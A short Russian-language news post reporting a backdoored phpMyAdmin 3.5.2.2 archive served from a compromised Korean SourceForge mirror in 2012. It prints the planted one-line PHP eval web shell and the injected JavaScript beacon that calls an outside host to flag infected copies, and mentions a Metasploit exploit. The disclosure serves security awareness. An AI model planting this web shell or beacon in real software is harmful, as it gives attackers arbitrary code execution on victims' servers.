Бэкдор в phpMyAdmin

в 22:00, , рубрики: backdoor, phpmyadmin, информационная безопасность, метки: ,

25 сентября стало известно о компрометации одно из корейских зеркал SourceForge (cdnetworks-kr-1).

В архив phpMyAdmin-3.5.2.2-all-languages.zip, находящийся на этом зеркале был внедрен бэкдор.

В архив был добавлен файл server_sync.php, содержащий код:

<?php @eval($_POST['c']);?>

позволяющий исполнение произвольного кода.

Также, был модифицирован файл js/cross_framing_protection.js, в него был добавлен код:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

позволяющий злоумышленнику узнавать о зараженных копиях.

На данный момент скомпрометированное зеркало исключено из ротации.

Команда SourceForge по логам определила, что количество скачавших этот файл около 400 человек. Всем скачавшим, кого удалось идентифицировать, на email было отправлено предупреждение.

Эксплоит для этой уязвимости уже попал в состав пакета Metasploit.

Источники:
phpMyAdmin corrupted copy on Korean mirror server
PMASA-2012-5
Compromised SourceForge mirror
Add exploit for phpmyadmin backdoor

Автор: truezemez

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js